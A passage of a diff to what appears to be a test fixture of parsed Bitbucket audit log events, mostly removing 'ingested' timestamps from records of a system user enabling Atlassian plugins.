"{\"timestamp\":\"2021-11-27T17:29:52.212Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.cleanup-hub-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0.7\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.cleanup-hub-plugin\"}]}", "type": "info", "kind": "event" @@ -3105,7 +3058,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867727460Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.203Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.browser.metrics.browser-metrics-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"8.0.2\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.browser.metrics.browser-metrics-plugin\"}]}", "type": "info", "kind": "event" @@ -3159,7 +3111,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867728413Z", "original": "{\"timestamp\":\"2021-11-27T17:29:52.201Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.authentication.atlassian-authentication-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.2.4\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.authentication.atlassian-authentication-plugin\"}]}", "type": "info", "kind": "event" @@ -3213,7 +3164,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867729411Z", "original": "{\"timestamp\":\"2021-11-27T17:29:51.049Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-remote-event-producer-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"6.3.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-remote-event-producer-plugin\"}]}", "type": "info", "kind": "event" @@ -3267,7 +3217,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867730486Z", "original": "{\"timestamp\":\"2021-11-27T17:29:51.037Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-remote-event-consumer-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"6.3.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-remote-event-consumer-plugin\"}]}", "type": "info", "kind": "event" @@ -3321,7 +3270,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867731470Z", "original": "{\"timestamp\":\"2021-11-27T17:29:51.022Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-plugins-webresource-rest\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.4.4-bitbucket1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-plugins-webresource-rest\"}]}", "type": "info", "kind": "event" @@ -3375,7 +3323,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867732411Z", "original": "{\"timestamp\":\"2021-11-27T17:29:51.005Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-plugins-webresource-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.4.4-bitbucket1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-plugins-webresource-plugin\"}]}", "type": "info", "kind": "event" @@ -3429,7 +3376,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867733451Z", "original": "{\"timestamp\":\"2021-11-27T17:29:51.001Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-clientside-extensions-runtime\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-clientside-extensions-runtime\"}]}", "type": "info", "kind": "event" @@ -3483,7 +3429,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867734635Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.889Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-client-resource\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.0.3\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-client-resource\"}]}", "type": "info", "kind": "event" @@ -3537,7 +3482,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867735726Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.887Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugins.atlassian-chaperone\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.1.6\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugins.atlassian-chaperone\"}]}", "type": "info", "kind": "event" @@ -3591,7 +3535,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867736660Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.863Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.plugin.atlassian-spring-scanner-runtime\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.2.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.plugin.atlassian-spring-scanner-runtime\"}]}", "type": "info", "kind": "event" @@ -3645,7 +3588,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867737636Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.862Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.oauth.serviceprovider.sal\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.oauth.serviceprovider.sal\"}]}", "type": "info", "kind": "event" @@ -3699,7 +3641,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867738624Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.861Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.oauth.serviceprovider\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.oauth.serviceprovider\"}]}", "type": "info", "kind": "event" @@ -3753,7 +3694,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867739519Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.849Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.oauth.consumer\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.oauth.consumer\"}]}", "type": "info", "kind": "event" @@ -3807,7 +3747,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867740408Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.846Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.oauth.admin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.oauth.admin\"}]}", "type": "info", "kind": "event" @@ -3861,7 +3800,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867741341Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.845Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.healthcheck.atlassian-healthcheck\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"5.1.1\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.healthcheck.atlassian-healthcheck\"}]}", "type": "info", "kind": "event" @@ -3915,7 +3853,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867742233Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.824Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.diagnostics.atlassian-diagnostics-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.1.2\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.diagnostics.atlassian-diagnostics-plugin\"}]}", "type": "info", "kind": "event" @@ -3969,7 +3906,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867743511Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.801Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.crowd.embedded.admin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"4.3.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.crowd.embedded.admin\"}]}", "type": "info", "kind": "event" @@ -4023,7 +3959,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867744465Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.718Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.business.insights.core-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.1.6\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.business.insights.core-plugin\"}]}", "type": "info", "kind": "event" @@ -4077,7 +4012,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867745386Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.698Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.business.insights.bitbucket-plugin\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"2.1.6\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.business.insights.bitbucket-plugin\"}]}", "type": "info", "kind": "event" @@ -4131,7 +4065,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867746446Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.697Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.support-info-providers\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.support-info-providers\"}]}", "type": "info", "kind": "event" @@ -4185,7 +4118,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867747381Z", "original": "{\"timestamp\":\"2021-11-27T17:29:50.634Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.feature-wrm-data\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.feature-wrm-data\"}]}", "type": "info", "kind": "event" @@ -4239,7 +4171,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867748342Z", "original": "{\"timestamp\":\"2021-11-27T17:29:49.656Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.config-wrm-data\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.config-wrm-data\"}]}", "type": "info", "kind": "event" @@ -4293,7 +4224,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867749515Z", "original": "{\"timestamp\":\"2021-11-27T17:29:49.399Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-xcode\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"7.18.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-xcode\"}]}", "type": "info", "kind": "event" @@ -4347,7 +4277,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867750520Z", "original": "{\"timestamp\":\"2021-11-27T17:29:49.394Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-webpack-INTERNAL\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"1.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-webpack-INTERNAL\"}]}", "type": "info", "kind": "event" @@ -4401,7 +4330,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867751546Z", "original": "{\"timestamp\":\"2021-11-27T17:29:48.385Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-web-resource-transformers\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-web-resource-transformers\"}]}", "type": "info", "kind": "event" @@ -4455,7 +4383,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867752449Z", "original": "{\"timestamp\":\"2021-11-27T17:29:48.370Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin enabled\"},\"affectedObjects\":[{\"name\":\"com.atlassian.bitbucket.server.bitbucket-web-api\",\"type\":\"MISC\"}],\"changedValues\":[],\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"method\":\"System\",\"extraAttributes\":[{\"nameI18nKey\":\"bitbucket.service.plugin.audit.attribute.version\",\"name\":\"Version\",\"value\":\"0.0\"},{\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"name\":\"target\",\"value\":\"com.atlassian.bitbucket.server.bitbucket-web-api\"}]}", "type": "info", "kind": "event" @@ -4509,7 +4436,6 @@ }, "event": { "action": "bitbucket.service.plugin.audit.action.pluginenabled", - "ingested": "2021-12-24T00:37:18.867753432Z", "original": "{\"timestamp\":\"2021-11-27T17:29:48.363Z\",\"author\":{\"name\":\"System\",\"type\":\"system\",\"id\":\"-1\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"bitbucket.service.audit.category.apps\",\"category\":\"Apps\",\"actionI18nKey\":\"bitbucket.service.plugin.audit.action.pluginenabled\",\"action\":\"Plugin 